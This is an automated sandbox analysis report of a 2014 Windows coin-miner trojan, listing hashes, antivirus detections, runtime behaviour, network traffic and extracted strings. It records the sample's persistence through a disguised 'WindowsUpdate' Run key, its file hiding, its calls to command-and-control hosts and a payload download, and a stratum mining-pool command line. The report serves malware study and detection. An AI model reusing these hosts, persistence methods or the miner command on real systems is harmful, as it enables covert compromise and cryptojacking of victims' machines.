Analysis Date: 2014-11-18 18:10:09
MD5: 559334a0652c9a9515646d53f162c74a
SHA1: af776b529d366b8ede32cdf89f6b6c9ee244cf4d

Static Details:

File type: PE32 executable for MS Windows (console) Intel 80386 32-bit
Section: .text md5: f02ff8e6b5f848005e0ea8c2bb1c9a7f sha1: 6e63ad80830fd43cadf219f01ebe39a25b063fb9 size: 167424
Section: .rdata md5: 07617105c2182f927bfbe735b8a7d13d sha1: 4bba9347f5e5990f144a51f34afe19c580336496 size: 49664
Section: .data md5: c8dd6458664ca6f20ea59ddc76c5c0ae sha1: 7b53f1898dca804c2ecdf3a97b10b39e7074f97f size: 7680
Section: .rsrc md5: 63a978a93afb85b47b650b22380a3ca0 sha1: e4efdf708da64a865afd2afab95c46f202058e90 size: 512
Section: .reloc md5: d63c69f7800df47562f0e41d8fc6967f sha1: 7fac03ce02844bcce093d9f0920c39ea61de907f size: 9728
Timestamp: 2014-11-12 07:24:29
Pdb path: C:\Users\MrUnzO\Documents\Visual Studio 2013\Projects\ConsoleApplication3\Release\ConsoleApplication3.pdb
Packer: Microsoft Visual C++ ?.?
PEhash: 412e25cc7d578a39c78d09c44cc66edd26000fb5
IMPhash: 524aa3c9404bd6078c3abcbeff12bd88
AV 360 Safe: Trojan.Generic.12136029
AV Ad-Aware: Trojan.Generic.12136029
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Arcabit (arcavir): no_virus
AV Authentium: W32/Heuristic-KPP!Eldorado
AV Avira (antivir): no_virus
AV BullGuard: no_virus
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): no_virus
AV ClamAV: no_virus
AV Dr. Web: no_virus
AV Emsisoft: Trojan.Generic.12136029
AV Eset (nod32): Win32/CoinMiner.VW
AV Fortinet: W32/CoinMiner.VW!tr
AV Frisk (f-prot): no_virus
AV F-Secure: Trojan.Generic.12136029
AV Grisoft (avg): Win32/DH{gRI2A2I}
AV Ikarus: Trojan.Win32.CoinMiner
AV K7: no_virus
AV Kaspersky: Trojan-Dropper.Win32.Sysn.aprg
AV MalwareBytes: no_virus
AV Mcafee: New Malware.ca
AV Microsoft Security Essentials: no_virus
AV MicroWorld (escan): no_virus
AV Norman: Trojan.Generic.12136029
AV Rising: no_virus
AV Sophos: no_virus
AV Symantec: no_virus
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe
Creates Process: C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\malware.exe"
Creates Process: C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "winlogin.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Creates Process: attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h ".."

Creates Process: attrib +h ".."

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\cfg"

Creates Process: attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\cfg"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "config.ini"

Creates Process: attrib +h "config.ini"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Creates Process: attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\config.ini"

Creates Process: attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\config.ini"

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "."

Creates Process: attrib +h "."

Process
↳ C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\malware.exe"

Creates Process: attrib +h "C:\malware.exe"

Process
↳ C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate ➝
"C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe" -autorun\\x00
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates File: C:\Documents and Settings\Administrator\Application Data\Windows\config.ini
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates Process: C:\WINDOWS\system32\cmd.exe /c attrib +h "config.ini"
Creates Process: C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"
Creates Process: C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\config.ini"
Creates Process: C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"
Creates Process: C:\WINDOWS\system32\cmd.exe /c attrib +h ".."
Creates Process: C:\WINDOWS\system32\cmd.exe /c attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\cfg"
Creates Process: C:\WINDOWS\system32\cmd.exe /c attrib +h "winlogin.exe"
Creates Process: C:\WINDOWS\system32\cmd.exe /c attrib +h "."
Creates Mutex: Local\$myprogram$
Winsock DNS: h4ck3r4k3.ddns.net
Winsock DNS: h4ck3r.info
Winsock DNS: ge.tt
Winsock URL: http://h4ck3r4k3.ddns.net/x.php?ID=0&V=3&cpu=2
Winsock URL: http://ge.tt/api/1/files/7ZgNjE32/0/blob?download
Winsock URL: http://H4CK3R.INFO/x.php?ID=0&V=3&cpu=2
Winsock URL: http://H4CK3R.INFO/c.php?V=3&ID=0&cpu=2

Process
↳ attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Process
↳ attrib +h ".."

Process
↳ attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\cfg"

Process
↳ attrib +h "config.ini"

Process
↳ attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\winlogin.exe"

Process
↳ attrib +h "C:\Documents and Settings\Administrator\Application Data\Windows\config.ini"

Process
↳ attrib +h "."

Process
↳ attrib +h "C:\malware.exe"

Network Details:

DNS: h4ck3r.info
Type: A
184.168.221.26
DNS: h4ck3r4k3.ddns.net
Type: A
8.23.224.90
DNS: ge.tt
Type: A
54.195.252.180
HTTP GET: http://h4ck3r.info/x.php?ID=0&V=3&cpu=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://h4ck3r4k3.ddns.net/x.php?ID=0&V=3&cpu=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://h4ck3r.info/c.php?V=3&ID=0&cpu=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://h4ck3r.info/x.php?ID=0&V=3&cpu=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://h4ck3r4k3.ddns.net/x.php?ID=0&V=3&cpu=2
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://ge.tt/api/1/files/7ZgNjE32/0/blob?download
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 184.168.221.26:80
Flows TCP: 192.168.1.1:1033 ➝ 8.23.224.90:80
Flows TCP: 192.168.1.1:1034 ➝ 184.168.221.26:80
Flows TCP: 192.168.1.1:1035 ➝ 184.168.221.26:80
Flows TCP: 192.168.1.1:1036 ➝ 8.23.224.90:80
Flows TCP: 192.168.1.1:1037 ➝ 54.195.252.180:80

Raw Pcap

Strings
/../
/..\
\../
\..\
- abort() has been called
af-za
af-ZA
america
american
american english
american-english
April
ar-ae
ar-AE
ar-bh
ar-BH
ar-dz
ar-DZ
ar-eg
ar-EG
ar-iq
ar-IQ
ar-jo
ar-JO
ar-kw
ar-KW
ar-lb
ar-LB
ar-ly
ar-LY
ar-ma
ar-MA
ar-om
ar-OM
ar-qa
ar-QA
ar-sa
ar-SA
ar-sy
ar-SY
ar-tn
ar-TN
ar-ye
ar-YE
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
australian
-autorun
az-az-cyrl
az-AZ-Cyrl
az-az-latn
az-AZ-Latn
BCONOUT$
be-by
be-BY
belgian
BENG
bg-bg
bg-BG
BGBR
BLC_ALL
bn-in
bn-IN
BR6002
britain
bs-ba-latn
bs-BA-Latn
ca-es
ca-ES
canadian
CCHN
CCHS
CCHT
CCZE
CDEA
CDEC
CDEL
CDES
CENA
CENB
CENC
CENG
CENI
CENJ
CENL
CENS
CENT
CENU
CENZ
CESA
CESB
CESC
CESD
CESE
CESF
CESG
CESH
CESI
CESL
CESM
CESN
CESO
CESR
CESS
CESU
CESV
CESY
CESZ
CFRB
CFRC
CFRL
CFRS
CGBR
china
chinese
chinese-hongkong
chinese-simplified
chinese-singapore
chinese-traditional
CHKG
CITS
CKAKA
CKOR
CNLB
CNLD
CNON
CNOR
CNZL
combase.dll
CPRI
CPTB
- CRT not initialized
cs-cz
cs-CZ
CSVF
CSVK
CTTO
CUSA
cy-gb
cy-GB
CZAF
czech
CZHH
CZHI
da-dk
da-DK
dddd, MMMM dd, yyyy
de-at
de-AT
December
de-ch
de-CH
de-de
de-DE
de-li
de-LI
de-lu
de-LU
div-mv
div-MV
DOMAIN error
dutch-belgian
Eccs
el-gr
el-GR
emscoree.dll
en-au
en-AU
en-bz
en-BZ
en-ca
en-CA
en-cb
en-CB
en-gb
en-GB
england
english-american
english-aus
english-belize
english-can
english-caribbean
english-ire
english-jamaica
english-nz
english-south africa
english-trinidad y tobago
english-uk
english-us
english-usa
en-ie
en-IE
en-jm
en-JM
en-nz
en-NZ
en-ph
en-PH
en-tt
en-TT
en-us
en-US
en-za
en-ZA
en-zw
en-ZW
es-ar
es-AR
es-bo
es-BO
es-cl
es-CL
es-co
es-CO
es-cr
es-CR
es-do
es-DO
es-ec
es-EC
es-es
es-ES
es-gt
es-GT
es-hn
es-HN
es-mx
es-MX
es-ni
es-NI
es-pa
es-PA
es-pe
es-PE
es-pr
es-PR
es-py
es-PY
es-sv
es-SV
es-uy
es-UY
es-ve
es-VE
et-ee
et-EE
eu-es
eu-ES
fa-ir
fa-IR
February
fi-fi
fi-FI
- floating point support not loaded
fo-fo
fo-FO
fr-be
fr-BE
fr-ca
fr-CA
fr-ch
fr-CH
french-belgian
french-canadian
french-luxembourg
french-swiss
fr-fr
fr-FR
Friday
fr-lu
fr-LU
fr-mc
fr-MC
german-austrian
german-lichtenstein
german-luxembourg
german-swiss
gl-es
gl-ES
great britain
gu-in
gu-IN
         (((((                  H
he-il
he-IL
HH:mm:ss
hi-in
hi-IN
holland
hong-kong
hr-ba
hr-BA
hr-hr
hr-HR
hu-hu
hu-HU
hy-am
hy-AM
id-id
id-ID
- inconsistent onexit begin-end variables
irish-english
is-is
is-IS
italian-swiss
it-ch
it-CH
it-it
it-IT
ja-jp
ja-JP
January
July
June
ka-ge
ka-GE
@KAKA
kernel32.dll
kk-kz
kk-KZ
kn-in
kn-IN
kok-in
kok-IN
ko-kr
ko-KR
ky-kg
ky-KG
LC_COLLATE
LC_CTYPE
LC_MONETARY
LC_NUMERIC
LC_TIME
lt-lt
lt-LT
lv-lv
lv-LV
March
Microsoft Visual C++ Runtime Library
mi-nz
mi-NZ
mk-mk
mk-MK
ml-in
ml-IN
MM/dd/yy
mn-mn
mn-MN
Monday
mr-in
mr-IN
ms-bn
ms-BN
ms-my
ms-MY
mt-mt
mt-MT
nb-no
nb-NO
new-zealand
nl-be
nl-BE
nl-nl
nl-NL
nn-no
nn-NO
norwegian
norwegian-bokmal
norwegian-nynorsk
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
ns-za
ns-ZA
(null)
October
pa-in
pa-IN
pl-pl
pl-PL
portuguese-brazilian
pr china
pr-china
Program: 
<program name unknown>
pt-br
pt-BR
pt-pt
pt-PT
puerto-rico
- pure virtual function call
quz-bo
quz-BO
quz-ec
quz-EC
quz-pe
quz-PE
R6008
R6009
R6010
R6016
R6017
R6018
R6019
R6024
R6025
R6026
R6027
R6028
R6030
R6031
R6032
R6033
R6034
ro-ro
ro-RO
runtime error 
Runtime Error!
ru-ru
ru-RU
sa-in
sa-IN
Saturday
se-fi
se-FI
se-no
se-NO
September
se-se
se-SE
SING error
sk-sk
sk-SK
slovak
sl-si
sl-SI
sma-no
sma-NO
sma-se
sma-SE
smj-no
smj-NO
smj-se
smj-SE
smn-fi
smn-FI
sms-fi
sms-FI
Software\Microsoft\Windows\CurrentVersion\Run
south africa
south-africa
south korea
south-korea
spanish-argentina
spanish-bolivia
spanish-chile
spanish-colombia
spanish-costa rica
spanish-dominican republic
spanish-ecuador
spanish-el salvador
spanish-guatemala
spanish-honduras
spanish-mexican
spanish-modern
spanish-nicaragua
spanish-panama
spanish-paraguay
spanish-peru
spanish-puerto rico
spanish-uruguay
spanish-venezuela
sq-al
sq-AL
sr-ba-cyrl
sr-BA-Cyrl
sr-ba-latn
sr-BA-Latn
sr-sp-cyrl
sr-SP-Cyrl
sr-sp-latn
sr-SP-Latn
%s%s
%s%s%s
Sunday
sv-fi
sv-FI
sv-se
sv-SE
swedish-finland
swiss
sw-ke
sw-KE
syr-sy
syr-SY
ta-in
ta-IN
te-in
te-IN
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
th-th
th-TH
Thursday
TLOSS error
tn-za
tn-ZA
trinidad & tobago
tr-tr
tr-TR
tt-ru
tt-RU
Tuesday
uk-ua
uk-UA
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UNICODE
united-kingdom
united-states
update.zip
ur-pk
ur-PK
USER32.DLL
UTF-16LE
UTF-8
uz-uz-cyrl
uz-UZ-Cyrl
uz-uz-latn
uz-UZ-Latn
vi-vn
vi-VN
Wednesday
WindowsUpdate
xh-za
xh-ZA
zh-chs
zh-CHS
zh-cht
zh-CHT
zh-cn
zh-CN
zh-hk
zh-HK
zh-mo
zh-MO
zh-sg
zh-SG
zh-tw
zh-TW
zu-za
zu-ZA
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
address family not supported
address_family_not_supported
address in use
address_in_use
address not available
address_not_available
ADVAPI32.dll
=(=[=a=g=n=v=
:%:A:I:N:z:
already connected
already_connected
 -a m7mhash -o stratum+tcp://xmg.suprnova.cc:7128 -u MrUnzO.nb -p x
AreFileApisANSI
argument list too long
argument out of domain
</assembly>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
<at-<rt"<wt
attrib +h "
.?AUctype_base@std@@
August
.?AUIBindStatusCallback@@
.?AUIUnknown@@
.?AVbad_alloc@std@@
.?AVbad_cast@std@@
.?AVbad_exception@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ifstream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ofstream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AVcodecvt_base@std@@
.?AV?$codecvt@DDH@std@@
.?AV?$ctype@D@std@@
.?AVDownloadStatus@@
.?AVerror_category@std@@
.?AVexception@std@@
.?AV_Facet_base@std@@
.?AVfacet@locale@std@@
.?AVfailure@ios_base@std@@
.?AV_Generic_error_category@std@@
.?AVios_base@std@@
.?AV?$_Iosb@H@std@@
.?AV_Iostream_error_category@std@@
.?AVlength_error@std@@
.?AV_Locimp@locale@std@@
.?AVlogic_error@std@@
.?AVout_of_range@std@@
.?AV_Ref_count_base@std@@
.?AV?$_Ref_count_del_alloc@V__ExceptionPtr@@P6AXPAV1@@ZV?$_DebugMallocator@H@@@std@@
.?AV?$_Ref_count@V__ExceptionPtr@@@std@@
.?AVruntime_error@std@@
.?AVscheduler_resource_allocation_error@Concurrency@@
.?AV_System_error_category@std@@
.?AVsystem_error@std@@
.?AV_System_error@std@@
.?AVtype_info@@
.?AVunsupported_os@Concurrency@@
> >A>y>
bad address
bad_address
bad allocation
bad cast
bad exception
bad file descriptor
bad_file_descriptor
bad locale name
bad message
 Base Class Array'
 Base Class Descriptor at (
__based(
;.;B;H;M;
BRichn
broken pipe
bWWWWj
__cdecl
CD$HPj
 Class Hierarchy Descriptor'
CloseHandle
CloseThreadpoolTimer
CloseThreadpoolWait
__clrcall
cmd.exe
CompareStringEx
CompareStringW
 Complete Object Locator'
COMSPEC
\config.ini
config.ini
connection aborted
connection_aborted
connection already in progress
connection_already_in_progress
connection refused
connection_refused
connection reset
connection_reset
ContextPriority
ContextStackSize
`copy constructor closure'
CopyFileA
Copyright (c) 1992-2004 by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
CorExitProcess
/c.php?V=3&ID=
CreateDirectoryA
CreateDirectoryW
CreateEventExW
CreateFile2
CreateFileW
CreateMutexA
CreateProcessA
CreateSemaphoreExW
CreateSymbolicLinkW
CreateThread
CreateThreadpoolTimer
CreateThreadpoolWait
CreateToolhelp32Snapshot
cross device link
>Cu/f9F
C:\Users\MrUnzO\Documents\Visual Studio 2013\Projects\ConsoleApplication3\Release\ConsoleApplication3.pdb
C:\Windows\system32\cmd.exe - 
D$0SVW
D$'9D$ 
@.data
dddd, MMMM dd, yyyy
_DebugMallocator<T>::allocate() - Integer overflow.
December
DecodePointer
`default constructor closure'
 delete
 delete[]
DeleteCriticalSection
DeleteFileW
destination address required
destination_address_required
:d<==E=V=g=
device or resource busy
<(<D<h<
D$hPh`
directory not empty
D$ SVW
D$(SVW
`dynamic atexit destructor for '
`dynamic initializer for '
DynamicProgressFeedback
__eabi
>)?E?f?
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
empty distance tree with lengths
EncodePointer
EnterCriticalSection
EnumChildWindows
EnumSystemLocalesEx
EnumSystemLocalesW
<@En[vP
executable format error
ExitProcess
__fastcall
February
file exists
filename too long
filename_too_long
file too large
FindClose
FindFirstFileA
FindNextFileA
FindWindowA
;F;`;j;t;
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
FlushProcessWriteBuffers
FreeEnvironmentStringsW
FreeLibraryWhenCallbackReturns
Friday
function not supported
>F>V>^>h>
;F<y<-=s=
G0Pj.S
G4Pj/S
G8PjDS
GDPjGS
GdPjOS
generic
GetACP
GetActiveWindow
GetClassNameA
GetCommandLineW
GetConsoleCP
GetConsoleMode
GetConsoleWindow
GetCPInfo
GetCurrentDirectoryW
GetCurrentPackageId
GetCurrentProcess
GetCurrentProcessId
GetCurrentProcessorNumber
GetCurrentProcessorNumberEx
GetCurrentThread
GetCurrentThreadId
GetDateFormatEx
GetEnvironmentStringsW
GetExitCodeProcess
GetFileAttributesExW
GetFileAttributesW
GetFileInformationByHandleExW
GetFileType
GetLastActivePopup
GetLastError
GetLastInputInfo
GetLocaleInfoEx
GetLocaleInfoW
GetLogicalProcessorInformation
GetLogicalProcessorInformationEx
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleExW
GetModuleHandleW
GetOEMCP
GetPrivateProfileIntA
GetProcAddress
GetProcessAffinityMask
GetProcessHeap
GetProcessWindowStation
GetStartupInfoW
GetStdHandle
GetStringTypeW
GetSystemDirectoryA
GetSystemTimeAsFileTime
GetThreadGroupAffinity
GetThreadTimes
GetTickCount
GetTickCount64
GetTimeFormatEx
GetUserDefaultLCID
GetUserDefaultLocaleName
GetUserObjectInformationW
GetVersionExW
GetWindowTextA
GetWindowThreadProcessId
HeapAlloc
HeapFree
HeapReAlloc
HeapSize
?(?H?h?
`h`hhh
HH:mm:ss
HHtVHHt
host unreachable
host_unreachable
Ht+Ht$Ht
http://ge.tt/api/1/files/7ZgNjE32/0/blob?download
http://h4ck3r4k3.ddns.net
http://H4CK3R.INFO
_hypot
identifier removed
illegal byte sequence
inappropriate io control operation
incomplete distance tree
incomplete dynamic bit lengths tree
incomplete literal/length tree
incorrect data check
incorrect header check
InitializeCriticalSectionAndSpinCount
InitializeCriticalSectionEx
InitializeSListHead
interrupted
invalid argument
invalid_argument
invalid bit length repeat
invalid block type
invalid distance code
invalid literal/length code
invalid seek
invalid stored block lengths
invalid string position
invalid window size
io error
ios_base::badbit set
ios_base::eofbit set
ios_base::failbit set
iostream
iostream stream error
:i=s=}=
is a directory
IsDebuggerPresent
IsProcessorFeaturePresent
IsValidCodePage
IsValidLocale
IsValidLocaleName
=;=J=`=
j0hHLC
j1n1r1v1$6(64686<6@6D6H6L6P6T6X6\6`6d6h6l6p6t6x6
jA[jZZ+
JanFebMarAprMayJunJulAugSepOctNovDec
January
jAZjZ^
:J:_:e:
j"_f9y
j@j _W
j	PjYV
KERNEL32.dll
LCMapStringEx
LCMapStringW
LeaveCriticalSection
l,kg<i
:,:L:l:
LoadLibraryA
LoadLibraryExW
LocalContextCacheSize
LocalFileTimeToFileTime
Local\$myprogram$
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
MaxConcurrency
MaxPolicyElementKey
MessageBoxW
message size
message_size
MinConcurrency
MM/dd/yy
Monday
MultiByteToWideChar
< <-<M<W<a<r<v<
need dictionary
network down
network_down
network reset
network_reset
network unreachable
network_unreachable
 new[]
_nextafter
)N\)N|
no buffer space
no_buffer_space
no child process
no link
no lock available
no message
no message available
no protocol option
no_protocol_option
no space on device
no stream resources
no such device
no such device or address
no such file or directory
no such process
not a directory
not a socket
not_a_socket
not a stream
not connected
not_connected
not enough memory
not supported
November
(null)
October
`omni callsig'
?!?O?n?
OpenProcess
operation canceled
operation in progress
operation_in_progress
operation not permitted
operation not supported
operation_not_supported
operation would block
operation_would_block
operator
OutputDebugStringW
oversubscribed distance tree
oversubscribed dynamic bit lengths tree
oversubscribed literal/length tree
owner dead
?$?\?p?
.P6AXPAV__ExceptionPtr@@@Z
__pascal
permission denied
permission_denied
~pjCXf
`placement delete closure'
`placement delete[] closure'
PP9E u
PPPPPPPP
Process32First
Process32Next
Processes
protocol error
protocol not supported
protocol_not_supported
PSSSSV
>(>,><>@>P>T>d>h>8?X?`?h?p?x?
__ptr64
PWWWWV
;';<;Q;i;
Qkkbal
QQSVWd
QQSVWh
QueryPerformanceCounter
=Q=X=\=`=d=h=l=p=t=
RaiseException
randll32.exe
`.rdata
ReadConsoleW
ReadFile
read only file system
ReadProcessMemory
RegCloseKey
RegCreateKeyExW
RegSetValueExW
@.reloc
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
      </requestedPrivileges>
      <requestedPrivileges>
resource deadlock would occur
Resource Monitor
resource unavailable try again
__restrict
restrict(
result out of range
RoInitialize
RoUninitialize
RtlUnwind
RVSQSWV
s(9C4u
Saturday
`scalar deleting destructor'
SchedulerKind
SchedulingProtocol
    </security>
    <security>
SendMessageA
September
SetCurrentDirectoryA
SetDefaultDllDirectories
SetEndOfFile
SetEnvironmentVariableA
SetEvent
SetFileInformationByHandleW
SetFilePointer
SetFilePointerEx
SetFileTime
SetLastError
SetStdHandle
SetThreadGroupAffinity
SetThreadpoolTimer
SetThreadpoolWait
SetThreadStackGuarantee
SetUnhandledExceptionFilter
SHELL32.dll
SHGetSpecialFolderPathA
ShowWindow
state not recoverable
__stdcall
stream timeout
`string'
string too long
Sunday
SunMonTueWedThuFriSat
SVjA[jZ^+
,SVWj0X
SVWjA_jZ+
SysListView32
system
SystemRoot
SystemTimeToFileTime
~';_t|%3
TargetOversubscriptionFactor
taskkill /IM 
Task Manager
_tcPVj@
TerminateProcess
text file busy
tfHtWHtHHt/
+t"HHt
tHHt*Ht#
__thiscall
!This program cannot be run in DOS mode.
Thursday
timed out
timed_out
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
too many files open
too_many_files_open
too many files open in system
too many length or distance symbols
too many links
too many symbolic link levels
  </trustInfo>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
Tuesday
;t$,v-
t WW9}
 Type Descriptor'
`typeof'
tyPVj@W
=%=T=Z=p=w=}=
:u<*=.>
uBjAYjZ+
`udt returning'
uHjAXf;
<\u#j\W
u#j,Xf;
__unaligned
UnhandledExceptionFilter
UNICODE
unknown compression method
unknown error
Unknown exception
 unzip 0.15 Copyright 1998 Gilles Vollant 
\update.zip
update.zip
UQPXY]Y[
URLDownloadToFileA
urlmon.dll
URLMON.DLL
URPQQh
USER32.dll
UTF-16LE
ux;s,u
=>>V>}>
&V=3&cpu=
value too large
`vbase destructor'
`vbtable'
`vcall'
__vectorcall
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
version
\version
VERSION
[VERSION]
VERSION = 1;
`vftable'
VirtualAllocEx
`virtual displacement map'
VirtualFreeEx
;=;V;`;m;
v	N+D$
WaitForSingleObject
WaitForThreadpoolTimerCallbacks
<	=W=c=r=*>}>
Wednesday
;W;g;q;w;
WideCharToMultiByte
\Windows
Windows Task Manager
\winlogin.exe
winlogin.exe
WinRTInitialization
Wj0XPV
WriteConsoleW
WriteFile
WritePrivateProfileStringA
WriteProcessMemory
wrong protocol type
wrong_protocol_type
wsprintfW
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
/x.php?ID=
xppwpp
xpxxxx
Yu2Vj@h